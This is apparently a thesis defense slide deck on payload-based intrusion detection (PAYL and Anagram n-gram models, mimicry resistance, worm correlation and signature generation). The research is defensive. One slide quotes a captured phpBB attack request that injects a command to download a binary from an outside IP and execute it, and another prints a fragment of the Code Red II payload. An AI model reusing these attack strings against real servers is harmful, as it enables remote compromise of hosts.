Network Payload-based Anomaly Detection and Content-based Alert Correlation
Ke Wang
Thesis Defense, Aug. 14th, 2006
Department of Computer Science, Columbia University
1
Network Payload-based Anomaly Detection and
Content-based Alert Correlation
Ke Wang
Thesis Defense, Aug. 14th, 2006
Department of Computer Science, Columbia University
2
Why do we need payload-based anomaly detection
Attacks that are normal connections may carry bad (anomalous) content indicative of a new exploit
Slow and stealthy, or targeted/hitlist worms do not display "loud and obvious" scanning or propagation behavior detectable via flow statistics
This sensor augments other sensors and enriches the view of the network
3
Conjecture and Goal: Detect Zero-Day Exploits via Content Analysis
Targeted attacks (sophisticated, stealthy, no "loud and obvious" propagation)
A true zero-day attack will manifest as "never before seen data" delivered to an application or server
Generate a signature immediately to stop further propagation; no need to wait for "payload prevalence" (a sufficient number of repeated occurrences of the same content)
Develop sensors that are accurate, efficient, and scalable, with resiliency to mimicry attacks
4
Contributions
Demonstrate the usefulness of analyzing network payload for anomaly detection
PAYL: 1-gram modeling
Anagram: higher order n-gram modeling
Randomized modeling/testing that can help thwart mimicry attacks
Ingress/egress payload correlation to capture a worm’s initial propagation attempt
Efficient privacy-preserving payload correlation across sites, and automatic signature generation
5
Contributions
Demonstrate the usefulness of analyzing network payload for anomaly detection
PAYL: 1-gram modeling (incremental learning; clustering for space saving; multi-centroid fine-grained modeling)
Anagram: higher order n-gram modeling
Randomized modeling/testing that can help thwart mimicry attacks
Ingress/egress payload correlation to capture a worm's initial propagation attempt
Efficient privacy-preserving payload correlation across sites
6
Motivation of PAYL
Content traffic to different ports has very different payload distributions
Within one port, packets with different lengths also have different payload distributions
Furthermore, worm/virus payloads are usually quite different from normal distributions
Previous work:
Attack signatures: Snort, Bro
First few bytes of a packet: NATE, PHAD, ALAD
Service-specific IDS [CKrugel02]: coarse modeling, 256 ASCII characters in 6 groups
7
Example byte distributions for different ports
(Figure panels: Src/Dest Port 22 = ssh, Src/Dest Port 25 = mail, Src/Dest Port 80 = web)
8
Example byte distribution for different payload lengths of port 80 on the same host server
9
CR II distribution versus a normal distribution
10
How to model "normal" content: 1-gram centroid
The average relative frequency of each byte, and the standard deviation of the frequency of each byte, for payload length 185 of port 80
Models are computed from the packet stream incrementally, conditioned on port/service and length of packet
Hands-free epoch-based training
Fine-grained multi-centroid modeling
Clustering: merge two neighbouring centroids if their Manhattan distance is smaller than a threshold; saves space, removes redundancy, linear-time computation; improves modeling accuracy for length bins with few training data (sparseness)
Self-calibration phase: sampled training data sets an initial threshold
Detection phase: packets are compared against models using the simplified Mahalanobis distance
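The 1-gram centroid and simplified Mahalanobis scoring described above can be sketched in Python. This is a minimal illustration only: the class name, the smoothing constant added to the standard deviation, and the single-centroid scope are assumptions, not the licensed PAYL implementation.

```python
class PaylCentroid:
    """1-gram centroid sketch: per-byte mean relative frequency and
    standard deviation, conceptually keyed by (port, payload length)."""

    def __init__(self, smoothing=0.001):
        self.n = 0
        self.sum = [0.0] * 256   # running sum of relative frequencies
        self.sq = [0.0] * 256    # running sum of squared frequencies
        self.smoothing = smoothing  # assumed constant, avoids divide-by-zero

    def _freq(self, payload: bytes):
        freq = [0.0] * 256
        for b in payload:
            freq[b] += 1.0 / len(payload)
        return freq

    def train(self, payload: bytes):
        freq = self._freq(payload)
        for i in range(256):
            self.sum[i] += freq[i]
            self.sq[i] += freq[i] ** 2
        self.n += 1

    def score(self, payload: bytes) -> float:
        """Simplified Mahalanobis distance:
        d(x, y) = sum_i |x_i - y_i| / (sigma_i + smoothing)."""
        freq = self._freq(payload)
        d = 0.0
        for i in range(256):
            mean = self.sum[i] / self.n
            var = max(self.sq[i] / self.n - mean ** 2, 0.0)
            d += abs(freq[i] - mean) / (var ** 0.5 + self.smoothing)
        return d
```

A higher score means the tested payload's byte distribution is further from the learned centroid.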
12
Performance comparison: single centroid vs. multi-centroid
Cons:
Cannot capture attacks displaying a normal byte distribution
Easily fooled by mimicry attacks with proper padding
14
Example: phpBB forum attack
Relatively normal byte distribution, so PAYL misses it
Abnormal sequence of commands for exploitation
The attack invariants: the subsequence of new, distinct byte values should be "malicious"
What we need: capture the order dependence of byte sequences, i.e., higher order n-gram modeling
GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo|..HTTP/1.1.Host:.128.59.16.26.User‑Agent:.Mozilla/4.0.(compatible;.MSIE.6.0;.Windows.NT.5.1;)..
15
Contributions
Demonstrate the usefulness of analyzing network payload for anomaly detection
Anagram: higher order n-gram modeling (binary-based modeling; Bloom filter for space efficiency; semi-supervised learning; privacy-preserving payload alerts for correlation)
Randomized modeling/testing that can help thwart mimicry attacks
Ingress/egress payload correlation to capture a worm's initial propagation attempt
Efficient privacy-preserving payload correlation across sites
16
Overview of Anagram
Binary-based higher order n-gram modeling
Models all the distinct n-grams appearing in the normal training data
During test, compute the percentage of never-seen distinct n-grams out of the total n-grams in a packet
Semi-supervised learning: normal traffic is modeled; prior known malicious traffic is modeled (Snort rules, captured malcode)
The model is space-efficient by using Bloom filters
Previous work:
Foreign system call sequences [Forrest96]
Trie-based n-gram storage and comparison
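The binary n-gram model over a Bloom filter can be sketched as follows. This is illustrative only: the filter size, the number of hash functions, and the use of SHA-1 as the hash family are assumptions, not the actual Anagram implementation.

```python
import hashlib


class Anagram:
    """Binary-based n-gram model backed by a Bloom filter (sketch).
    Scores a packet by the fraction of its n-grams never seen in
    training; membership is only ever over-reported (Bloom semantics),
    so the score can under-count, never over-count, new n-grams."""

    def __init__(self, n=5, bits=2 ** 20, hashes=3):
        self.n, self.bits, self.hashes = n, bits, hashes
        self.filter = bytearray(bits // 8)

    def _positions(self, gram: bytes):
        # Derive `hashes` bit positions from salted SHA-1 digests.
        for i in range(self.hashes):
            h = hashlib.sha1(bytes([i]) + gram).digest()
            yield int.from_bytes(h[:8], "big") % self.bits

    def train(self, payload: bytes):
        for i in range(len(payload) - self.n + 1):
            for p in self._positions(payload[i:i + self.n]):
                self.filter[p // 8] |= 1 << (p % 8)

    def score(self, payload: bytes) -> float:
        total = max(len(payload) - self.n + 1, 1)
        new = 0
        for i in range(len(payload) - self.n + 1):
            gram = payload[i:i + self.n]
            if not all(self.filter[p // 8] & (1 << (p % 8))
                       for p in self._positions(gram)):
                new += 1  # never-seen n-gram
        return new / total
```

A packet whose n-grams all appeared in training scores 0; a packet of entirely novel content scores close to 1.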
False positive rate (with 100% detection rate) for different training times and different values of n for the n-grams
Low false positive rate per packet (better per flow)
No significant gain after 4 days' training
Higher order n-grams need longer training time to build a good model
3-grams are not long enough to distinguish malicious byte sequences from normal ones
Normal traffic: real web traffic collected from two CUCS web servers
Test worms: CR, CRII, WebDAV, Mirela, phpBB forum attack, nsiislog.dll buffer overflow (MS03-022)
The false positive rate (with 100% detection rate) for different n-grams, under both normal and semi-supervised training – per packet rate
21
Mimicry attacks
Attackers can mimic normal traffic and hide the exploit inside "the sled" to evade the sensor easily
Example: the polymorphic mimicry worm developed by [OK05] targeting PAYL, which does encoding and traffic blending to simulate the normal profile
22
Contributions
Demonstrate the usefulness of analyzing network payload for anomaly detection
Randomized modeling/testing that can help thwart mimicry attacks
Ingress/egress payload correlation to capture a worm’s initial propagation attempt
Efficient privacy-preserving payload correlation across sites
23
Randomization against mimicry attacks
The general idea of payload-based mimicry attacks is to craft small pieces of exploit code with a large amount of "normal" padding to make the whole packet look normal
If we randomly choose the payload portion for modeling/testing, the attacker does not know precisely which byte positions it may have to pad to appear normal, making it harder to hide the exploit code
This is a general technique that can be used for both PAYL and Anagram, or any other payload anomaly detector
For Anagram, additional randomization: keep the n-gram size a secret
24
Randomized Modeling
Separate the whole packet randomly into several (possibly interleaved) substrings or subsequences S1, S2, ..., SN, and build one model for each of them
The test packet's payload is divided accordingly
25
Shortcomings:
Models from sub-partitions may be similar: higher memory consumption, no real model diversity
The test partitioning needs to be the same as the training partitioning: less flexibility; need to retrain to change partitions
(Figure: the top plot is the model built from the whole packet; the bottom two are the models built from two random sub-partitions.)
26
Randomized Testing
A simpler strategy that does not incur substantial overhead
Build one model for the whole packet, and randomize the tested portions
Separate the whole packet randomly into several (possibly interleaved) partitions S1, S2, ..., SN
Score each randomly chosen partition separately
Use the maximum score: Score_new = max_i (N_i / T_i)
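One way to realize this, sketched below, is to assign each payload byte to a random partition and take the maximum partition score. Here `score_fn`, the number of partitions, and the seed are hypothetical parameters standing in for any payload anomaly scorer (e.g., a PAYL- or Anagram-style score):

```python
import random


def randomized_test_score(payload: bytes, score_fn, parts=4, seed=None):
    """Randomized testing (sketch): split the payload into `parts`
    randomly interleaved partitions, score each partition with the
    detector's score function, and return the maximum score."""
    rng = random.Random(seed)
    partitions = [bytearray() for _ in range(parts)]
    for b in payload:
        partitions[rng.randrange(parts)].append(b)
    return max(score_fn(bytes(p)) for p in partitions if p)
```

Because the attacker cannot predict which bytes land in which partition, padding the packet to look globally normal no longer guarantees that every tested partition looks normal.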
27
28
PAYL test on the mimicry attack designed by [OK05] targeting it, 20-fold randomized testing:

                      Detection times   Avg. FP   Std. FP
Pure random mask      16/20             0.269%    0.375%
Chunked random mask   14/20             0.175%    0.409%
29
Anagram test: average false positive rate and standard deviation with 100% detection rate, chunked random mask, 10-fold randomized testing
(Results shown for both normal training and semi-supervised training.)
30
Contributions
Demonstrate the usefulness of analyzing network payload for anomaly detection
Randomized modeling/testing that can help thwart mimicry attacks
Ingress/egress payload correlation to capture a worm's initial propagation attempt (detect slow or stealthy worms; immediate signature generation)
Efficient privacy-preserving payload correlation across sites
31
Ingress/egress correlation to detect worm propagation
Self-propagating worms will start attacking other machines (by sending at least the exploit portion of their content) shortly after a host is infected
The attacked destination port will be the same, since the worm is exploiting the same vulnerability
An approach to stop the worm's very first propagation attempt: if we detect anomalous egress packets to port i that are very similar to anomalous ingress packets to port i, there is a high probability that a worm has started its propagation
Advantage: can detect slow or stealthy worms, which won't show probe behavior and thus avoid probe detectors
32
Similarity metrics to compare the payloads of two or more anomalous packet alerts (similarity score in [0, 1]):

Metric                              Data used   Handles fragments   Detects metamorphic   Score
String equality (SE)                Raw data    No                  No                    1 for equal, 0 otherwise
Longest common substring (LCS)      Raw data    Yes                 No                    2*C/(L1+L2)
Longest common subsequence (LCSeq)  Raw data    Yes                 Some                  2*C/(L1+L2)
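For example, the LCS similarity with the 2*C/(L1+L2) score from the table can be computed with a standard dynamic program (a sketch; the function name is ours):

```python
def lcs_similarity(a: bytes, b: bytes) -> float:
    """Longest-common-substring similarity, scored 2*C/(L1+L2),
    where C is the length of the longest common substring and
    L1, L2 are the payload lengths. O(len(a)*len(b)) time."""
    best = 0
    prev = [0] * (len(b) + 1)
    for i in range(1, len(a) + 1):
        cur = [0] * (len(b) + 1)
        for j in range(1, len(b) + 1):
            if a[i - 1] == b[j - 1]:
                cur[j] = prev[j - 1] + 1  # extend the matching run
                best = max(best, cur[j])
        prev = cur
    return 2 * best / (len(a) + len(b)) if (a or b) else 0.0
```

Identical payloads score 1; payloads with no common substring score 0.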
Experiment result
33
|d0|$@|0 ff|5|d0|$@|0|h|d0| @|0|j|1|j|0|U|ff|5|d8|$@|0 e8 19 0 0 0 c3 ff|%`0@|0 ff|%d0@|0 ff|%h0@|0 ff|%p0@|0 ff|%t0@|0 ff|%x0@|0 ff|%|0@|fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc 0 0 0 0 0 0 0 0 0 0 0 0 0|\EXPLORER.EXE|0 0 0|SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon|0 0 0|SFCDisable|0 0 9d ff ff ff|SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots|0 0 0 0|/Scripts|0 0 0 0|/MSADC|0 0|/C|0 0|/D|0 0|c:\,,217|0 0 0 0|d:\,,217|fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc…
LCS signature generation: Code Red II
[...] substrings or tokens from suspicious IPs, which still depends on the scanning behavior
Detection occurs some time after the worm propagation
Cannot detect slow and stealthy worms
35
Contributions
Demonstrate the usefulness of analyzing network payload for anomaly detection
Randomized modeling/testing that can help thwart mimicry attacks
Ingress/egress payload correlation to capture a worm's initial propagation attempt
Each site has a distinct content flow: diversity via content (not system or software)
Find global, common "invariants in content": if multiple sites see the same or similar content alerts, it is highly likely to be a true worm or targeted outbreak
Separate TPs from FPs: the "false false positive" problem
Reduces false positives by creating white lists of those alerts that cannot be correlated
Higher standard to prevent mimicry attacks: exploit writers/attackers have to learn the distinct content traffic patterns of many different sites
Needs to be privacy-preserving
37
Related Research
DNAD/Worminator (slow/IP) sharing
Domino alert sharing
The DShield.org model for content sharing and querying
Could also serve as a "trap" to detect [...]
(Figure captions:)
Frequency distribution; the most frequent character is a space (ASCII code 32). Size ≈ 8160 bits.
List of 3-grams in the original string. A box represents a space; the underlined n-gram appears twice in the original alert. 25 n-grams take approximately 600 bits.
Bloom filter of the above n-grams. If three hash values are used, a minimum optimal size would be ~150 bits.
Z-String; the space (box) is the most frequent character. Non-appearing characters are removed. 15 characters = 120 bits.
40
Real traffic evaluation
Goal: measure performance in identifying true alerts from false positives
Ideal: true positives have very high similarity scores, while false positives have very low scores
Mix the collection of attacks into two hours of traffic from www and www1
Multiple, differently-fragmented instances of Code Red and Code Red II simulate a real worm attack
Mixed sets are run through PAYL and Anagram, with the alerting threshold reduced so that 100% of attacks are detected, but with possibly higher FP rates
String evaluation
41
Real traffic evaluation (II)
False positive score range; the blue bar represents the 99.9th percentile, white the maximum score
Range of scores across multiple instances of the same worm (CR or CRII), and across instances of different worms (CR vs. CRII), e.g., polymorphism
Methods are, from 1 to 8: Raw-LCS, Raw-LCSeq, Raw-ED, Freq-MD, ZStr-LCS, ZStr-LCSeq, ZStr-ED, N-grams with n=5.
42
Real traffic evaluation (III)
Correlation of identical (non-polymorphic) attacks works accurately for all techniques; non-fragmented attacks score near 1
Z-Strings (MD, LCSeq, ED) and n-grams handle fragmentation well
Polymorphism is hard to detect; only Raw-LCSeq and n-grams score well
Overall, n-grams are particularly effective at eliminating false positives, and Bloom filters enable privacy preservation
43
Signature Generation
Each class of techniques can generate its own signature
Raw packets: exchange the LCS/LCSeq (not privacy-preserving)
Byte frequency/Z-Strings: given the frequency distribution, the Z-String is generated by ordering bytes from most to least frequent and dropping the least frequent
N-grams: robust to reordering or fragmentation; if position information is available, can "flatten" into a deployable string signature
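A Z-String as described can be derived directly from the byte-frequency distribution (a sketch; the `keep` cutoff of 15 follows the earlier 15-character example and is otherwise an assumption):

```python
from collections import Counter


def z_string(payload: bytes, keep: int = 15) -> bytes:
    """Z-String sketch: order the byte values that appear in the
    payload from most to least frequent, drop non-appearing bytes,
    and truncate to the `keep` most frequent. Ties break on byte
    value so the result is deterministic."""
    counts = Counter(payload)
    ranked = sorted(counts, key=lambda b: (-counts[b], b))
    return bytes(ranked[:keep])
```

Because only the rank order of byte frequencies is shared, the raw payload itself is not revealed, which is what makes the representation privacy-preserving.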
44
Signature/Query generation (II)
Accuracy of the signatures: the cumulative frequency of signature match scores computed by matching normal traffic against different worm signatures. The closer to the y-axis, the more accurate.
The six curves represent, in order from left to right: 1) n-gram signature, 2) Z-string signature compared using LCS, 3) LCS of the raw signature, 4) Z-string signature using LCSeq, 5) LCSeq of the raw signature, 6) byte-frequency signature.
46
Signature for polymorphic worms
Our approaches work poorly here, since they are based on payload similarity
Will there be enough invariants for an accurate signature?
Slammer: first byte "0x04"
CLET shellcode 2: "\0xff\0xff\0xff" and "\0xeb\0x31"
Proposed alternative: a "generalized signature" specifying the higher-level pattern of an attack, instead of being raw-payload based: "0xeb 0x31"B {92 bytes, entropy: E, "0xff 0xff 0xff"B}
47
Conclusions
Network payload-based PAYL and Anagram can detect zero-day attacks with high accuracy and low false positives
Randomization helps thwart mimicry attacks
Ingress/egress correlation detects a worm's initial propagation and generates accurate worm signatures; good at detecting slow/stealthy worms
Privacy-preserving payload alert correlation across sites can identify true anomalies and reduce false positives, with accurate signature generation
48
Accomplishments
Major papers:
Anagram: A Content Anomaly Detector Resistant to Mimicry Attack, K. Wang, J. Parekh, S. Stolfo, RAID, Sept 2006.
Privacy-preserving Payload-based Correlation for Accurate Malicious Traffic Detection, J. Parekh, K. Wang, S. Stolfo, SIGCOMM LSAD Workshop, Sept 2006.
Anomalous Payload-based Worm Detection and Signature Generation, K. Wang, G. Cretu, S. Stolfo, RAID, Sept 2005.
FLIPS: Hybrid Adaptive Intrusion Prevention, M. Locasto, K. Wang, A. Keromytis, S. Stolfo, RAID, Sept 2005.
Anomalous Payload-based Network Intrusion Detection, K. Wang, S. Stolfo, RAID, Sept 2004.
Software implementation (licensed by Columbia): PAYL sensor, Anagram sensor
49
Future Work
Further evaluation, including measures/features of high-entropy partitions
Optimization problem: model parameter settings (n-gram size, thresholds, etc.), random mask generation
Real deployment of multiple-site correlation
Shadow server architecture implementation and testing
Pushing into the host: integration with instrumented application software
50
Thank you!
Q/A?
51
Backup slides
52
Overview of PAYL: how it works
Principles of operation:
Normal packet content is automatically learned, based upon unsupervised anomaly detection algorithms
Fine-grained modeling of normal payload: site and application specific, also conditioned on packet length
Build the byte frequency distribution and its standard deviation as the normal profile
For test data, compute the simplified Mahalanobis distance against its centroid to measure similarity
Each site/host has a "unique" content flow that may be automatically learned
UAD generates a model over "unlabeled" data
The model detects anomalies in collected training data (forensics) and anomalies in the data stream (detection)
Computational approach: outlier detection
Two frameworks: geometric and probabilistic/statistical
Several algorithms; PAYL is based upon comparison of content statistical distributions
Handles "noise" in the data: no guarantees of "attack-free" data, but assumes most data is "attack-free"
Return to main slides
54
Epoch-based learning
To determine how much training data is enough, or whether the model is ready for use
An epoch is measured in terms of the number of packets analyzed, or by means of a time period
The training phase is sufficiently complete if the currently computed model has changed little for several consecutive epochs
Need to define model similarity measurements
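A minimal sketch of that stopping rule, assuming a per-epoch model-change metric (e.g., the Manhattan distance between successive epoch models); the threshold and epoch-count values below are illustrative, not the thesis's settings:

```python
def training_complete(epoch_distances, threshold=0.05, stable_epochs=3):
    """Epoch-based stopping sketch: training is sufficiently complete
    when the model-change metric has stayed below `threshold` for
    `stable_epochs` consecutive epochs."""
    if len(epoch_distances) < stable_epochs:
        return False
    return all(d < threshold for d in epoch_distances[-stable_epochs:])
```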
55
Epoch-based learning: PAYL
Metric 1: number of new centroids produced in the current epoch
Metric 2: Manhattan distance of each centroid to the nearest one computed in the prior epoch
Return to main slides
56
(Figure: likelihood of seeing new n-grams per 10,000 content packets, for 3-grams, 5-grams, and 7-grams; the likelihood ranges from 0 to 0.01.)
The likelihood of seeing new n-grams is the percentage of new distinct n-grams out of the total n-grams in this epoch.
The computed Mahalanobis distance of the normal and attack packets
The normal data's distances are displayed as several bands, which illustrates that we might have multiple centroids for one length
58
Multiple-centroid modeling for each length
Goal: build finer-grained models for the payload to detect anomalies more accurately
Problems:
We don't know how many clusters may exist
We can only access each packet's data once, in sequence; we cannot store the packets in memory
So traditional clustering algorithms like K-means or EM cannot easily be applied here
Our solution:
Standard metric to compare two statistical distributions, the Mahalanobis distance:
d(x, y) = (x - y)^T C^{-1} (x - y), where C_ij = Cov(y_i, y_j)
Here x is the test data and y is its profile. When we assume each ASCII value is independent, the formula can be simplified to:
d(x, y) = sum_{i=0}^{n-1} |x_i - y_i| / sigma_i
Return to main slides
60
Incremental Learning
Average of N data points: mean_N = (1/N) * sum_{i=1}^{N} x_i
When the (N+1)-th data point arrives:
mean_{N+1} = (N * mean_N + x_{N+1}) / (N+1) = mean_N + (x_{N+1} - mean_N) / (N+1)
For the standard deviation, we can rewrite the variance as:
Var(X) = E(X - EX)^2 = E(X^2) - (EX)^2
Therefore we don't need to keep previous data to update the average and standard deviation
Each centroid stores only the averages of x and x^2
Return to main slides
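The update rules above translate directly into a small running-statistics class (a sketch; the class and attribute names are ours):

```python
class RunningStats:
    """Incremental mean/std sketch: keeps only the running averages
    of x and x^2, as on the slide, so no past data is stored."""

    def __init__(self):
        self.n = 0
        self.mean = 0.0      # running E[X]
        self.mean_sq = 0.0   # running E[X^2]

    def update(self, x: float):
        self.n += 1
        # mean_{N+1} = mean_N + (x_{N+1} - mean_N) / (N+1)
        self.mean += (x - self.mean) / self.n
        self.mean_sq += (x * x - self.mean_sq) / self.n

    @property
    def std(self) -> float:
        # Var(X) = E(X^2) - (E X)^2
        return max(self.mean_sq - self.mean ** 2, 0.0) ** 0.5
```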
61
Manhattan distance

  Mdis(x, y) = Σ_{i=0}^{n−1} |x_i − y_i|

[Figure: two example byte histograms x and y]

  Example: Mdis(x, y) = Σ_{i=1}^{6} |x_i − y_i| = 23
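The metric in code (a minimal sketch):

```python
def manhattan(x, y):
    """Manhattan distance between two byte-frequency
    distributions of equal length."""
    return sum(abs(xi - yi) for xi, yi in zip(x, y))

# Example over three bins:
assert manhattan([1, 2, 3], [4, 0, 3]) == 5
```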
62
Example of clustering across length bins

Original centroids

Clustered centroids
Return to main slides
63
Self-calibration
 Training data is sampled
 Use a FIFO buffer to keep the most recent samples, to capture concept drift
 After training, compute the distances of the samples against the centroid and set the anomaly threshold to the maximum
 At the start of the detection phase, increase the threshold by t% if the alert rate is higher than a user-specified parameter
Return to main slides
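A sketch of this calibration logic, with illustrative names; the per-sample distances are assumed to be precomputed by the sensor:

```python
from collections import deque

class SelfCalibrator:
    """FIFO of recent training-sample distances; threshold = max
    distance among those samples, inflated by t% whenever the
    observed alert rate exceeds the user-specified target."""
    def __init__(self, capacity, t_percent, max_alert_rate):
        self.samples = deque(maxlen=capacity)  # FIFO captures concept drift
        self.t = t_percent / 100.0
        self.max_alert_rate = max_alert_rate
        self.threshold = None

    def add_sample(self, distance):
        self.samples.append(distance)

    def finish_training(self):
        self.threshold = max(self.samples)

    def adjust(self, alerts, packets):
        # At the start of detection: raise the threshold by t%
        # if the alert rate is above the target.
        if packets and alerts / packets > self.max_alert_rate:
            self.threshold *= 1.0 + self.t
```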
Semi-batch clustering for stream processing

Main idea:
 Store byte distributions of M packets
 Optimize aggregate clustering of the M packets
 Merge the resulting centroids into the existing centroids from the prior batch of data
 Can ameliorate the problem of packet ordering
 The batch size M needs to be chosen properly: a tradeoff between accuracy and memory consumption
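A minimal sketch of this idea; the greedy nearest-centroid merge below stands in for the batch optimization step, and the merge threshold is an illustrative parameter:

```python
def manhattan(x, y):
    return sum(abs(a - b) for a, b in zip(x, y))

class SemiBatchClusterer:
    """Buffers M byte distributions, then folds each one into the
    nearest existing centroid (count-weighted average) or starts a
    new centroid if none is within merge_threshold."""
    def __init__(self, batch_size, merge_threshold):
        self.M = batch_size
        self.merge_threshold = merge_threshold
        self.buffer = []
        self.centroids = []  # list of (mean_vector, sample_count)

    def add(self, dist):
        self.buffer.append(dist)
        if len(self.buffer) >= self.M:
            self.flush()

    def flush(self):
        for x in self.buffer:
            self._merge(x)
        self.buffer = []

    def _merge(self, x):
        best, best_d = None, None
        for i, (c, _) in enumerate(self.centroids):
            d = manhattan(x, c)
            if best_d is None or d < best_d:
                best, best_d = i, d
        if best is not None and best_d <= self.merge_threshold:
            c, n = self.centroids[best]
            new_c = [(ci * n + xi) / (n + 1) for ci, xi in zip(c, x)]
            self.centroids[best] = (new_c, n + 1)
        else:
            self.centroids.append((list(x), 1))
```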
67
One-pass clustering result. First six centroids for W dataset, length 1460
68
Semi-batch clustering result. First six centroids for W dataset, length 1460
Return to main slides
69
Performance
 Training over 3 days of data, detection over 2 days
 Data from two web servers
 Training: 29 seconds (60 Mbits/sec)
 Detection: 12 seconds (54 Mbits/sec)
 FP rate: 42 / 625,595 packets (0.006%)
 Coverage: 20 of 30 known attacks in the data detected
70
Bloom filter
 A Bloom filter (BF) is a one-way data structure that supports insert and verify operations, yet is fast and space-efficient
 Represented as a bit vector; bit b is set if h_i(e) = b, where h_i is a hash function and e is the element in question
 No false negatives, although false positives are possible in a saturated BF via hash collisions; use multiple hash functions for robustness
 Each n-gram is a candidate element to be inserted or verified in the BF
 Bloom filters are also privacy-preserving, since n-grams cannot be extracted from the resulting bit vector
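A minimal Bloom filter sketch; deriving the k hash positions from SHA-256 is an illustrative choice, not a detail prescribed by the thesis:

```python
import hashlib

class BloomFilter:
    """Bit-vector Bloom filter with k derived hash functions.
    Supports insert and verify; elements (n-grams) cannot be
    recovered from the bit vector, only tested for membership."""
    def __init__(self, size_bits=2 ** 20, num_hashes=3):
        self.m = size_bits
        self.k = num_hashes
        self.bits = bytearray(self.m // 8)

    def _positions(self, ngram: bytes):
        # One salted SHA-256 digest per hash function.
        for i in range(self.k):
            h = hashlib.sha256(bytes([i]) + ngram).digest()
            yield int.from_bytes(h[:8], "big") % self.m

    def insert(self, ngram: bytes):
        for b in self._positions(ngram):
            self.bits[b // 8] |= 1 << (b % 8)

    def verify(self, ngram: bytes) -> bool:
        return all(self.bits[b // 8] >> (b % 8) & 1
                   for b in self._positions(ngram))
```

In use, every n-gram of a training payload is inserted; at detection time each n-gram of a test payload is verified against the filter.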
The binary-based approach is simple and efficient, but too sensitive to noisy data

Pre-compute a bad content model using Snort rules and a collection of worm samples, to supervise the learning
 This model should match very few normal packets, while identifying malicious traffic (often, new exploits reuse portions of old exploits)
 The model contains the distinct n-grams appearing in these malcode collections
 Use a small, clean dataset to exclude the normal n-grams appearing in the Snort rules and virus samples
73
Bad content model (purple part)
N-grams in snort rules and collected malwares
N-grams in clean traffic
74
[Figure: two histograms; x-axis: Bad Content Model Matching Score, y-axis: percentage of the packets; left panel: Normal Content Packets, right panel: Attack Packets]
Distribution of bad content matching scores for normal packets (left) and attack packets (right).
The “matching score” is the percentage of the n-grams of a packet that match the bad content model
75
Use of bad content model

Training: ignore possibly malicious n-grams
 Packets whose n-grams match the bad content model beyond a maximum number are ignored
 Packets with a high matching score (>5%) are ignored, since new attacks might reuse old exploit code
 Ignoring a few packets is harmless for training

Testing: scoring separates malicious from normal
 If a never-before-seen n-gram also appears in the bad content model, give it a higher weight factor t (t = 5 in our experiments)

  Score = (N_new + t · N_new_bad) / T

where N_new counts the never-seen n-grams not in the bad content model, N_new_bad the never-seen n-grams that do match it, and T the total number of n-grams in the packet.
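A sketch of the weighted scoring; `known_bf` and `bad_bf` stand for the normal-traffic and bad-content Bloom filters, and any object with a `verify(ngram) -> bool` method works:

```python
def anagram_score(payload: bytes, n, known_bf, bad_bf, t=5):
    """Score = (N_new + t * N_new_bad) / T: new n-grams count 1,
    new n-grams that also match the bad content model count t,
    and T is the total number of n-grams in the packet."""
    grams = [payload[i:i + n] for i in range(len(payload) - n + 1)]
    if not grams:
        return 0.0
    n_new = n_new_bad = 0
    for g in grams:
        if not known_bf.verify(g):
            if bad_bf.verify(g):
                n_new_bad += 1
            else:
                n_new += 1
    return (n_new + t * n_new_bad) / len(grams)
```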
Back
76
Feedback-based learning with shadow servers
 Training attacks: an attacker sends malicious data during training time to poison the model
  The bad content model cannot guarantee 100% detection
 The most reliable defense is to use the feedback of a host-based shadow server to supervise the training
 Also useful for adaptive learning to accommodate concept drift
 PAYL/Anagram can be used as a first-line classifier to amortize the expensive cost of the shadow server
  Only a small percentage of the traffic is sent to the shadow server, instead of all of it
  The feedback of the shadow server can improve the accuracy of Anagram
77
Back
78
The structure of the mimicry worm
79
The maximum possible padding length per packet for different varieties of this mimicry attack

Version (x, y):  418, 10 | 418, 100 | 730, 10 | 730, 10 | 730, 100 | 730, 100
Padding length:    125   |   149    |   437   |   461   |   1167   |   1191

Each cell in the top row contains a tuple (x, y), representing a variant sequence of y packets of x bytes each. The second row gives the maximum number of bytes that can be used for padding in each packet.
Return to main
Launched CodeRed and CodeRed II in our controlled test environment, captured the traces, and merged them into a real web server’s trace
 Simulates a real worm attacking and propagating on a real server
Interesting behavior observed about the worm:
 Propagation occurred with packets fragmented differently than the initial attack packets
 Multiple types of fragmentation
81
Different fragmentation for CR and CRII

Code Red II (total 3818 bytes)
  Incoming: 1460, 1460, 898
  Outgoing: 1448, 1448, 922

Code Red (total 4039 bytes)
  Incoming: 4, 13, 453, 1460, 1460, 649
            4, 375, 1460, 1460, 740
            4, 13, 362, 91, 1460, 1460, 649
  Outgoing: 1448, 1448, 1143
82
Results of correlation for different metrics

Metric      | Detects propagation | False alerts
SE          | No                  | No
LCS(0.5)    | Yes                 | No
LCSeq(0.5)  | Yes                 | No

The number in parentheses is the threshold setting for the similarity score used to decide whether a propagation has occurred
Return to main
83
Data Diversity
Example byte distribution for payload length 536 of port 80 for the three sites.
84
Sites   | 3 largest (length, distance) pairs
EX, W   | 1448, 0.7896 | 1460, 0.7851 | 216, 0.6241
EX, W1  | 1460, 0.9746 | 1448, 0.8731 | 536, 0.5540
W, W1   | 892, 0.7502  | 1460, 0.7456 | 1448, 0.7122

PAYL: for each pair of sites, the 3 packet lengths with the largest Manhattan distance between their byte distributions.

Dataset A    | Dataset B    | Common 5-grams | Common Perc (%)
EX (509347)  | W (953345)   | 129468         | 17.5%
EX (509347)  | W1 (974292)  | 99366          | 13.4%
W1 (974292)  | W (953345)   | 454586         | 47.2%

Anagram: the number of unique 5-grams in datasets W, W1, and EX, and the number of common 5-grams between each pair of sites.
Back
85
Testing methodology
Three sets of traffic:
 www1 and www2: Columbia webservers, 100 packets each
 Malicious packet dataset, 56 packets
 Known ground truth

Arranged into three sets of pairs:
 10,000 “good vs. good”
 1,540 “bad vs. bad”
 5,600 “good vs. bad” between www1 and the malicious dataset

Compare:
 Similarity of the approaches
 Effectiveness in correlating
 Ability to generate signatures
86
Similarity – direct string comparison
[Figure: similarity scores over 80 random packet pairs; y-axis: similarity score (0–1); curves: Raw LCS, Zstr LCS, Raw LCSeq, Raw ED, Manhattan Distance, Zstr LCSeq, Zstr ED]
High-level view of score similarities (80 random pairs)
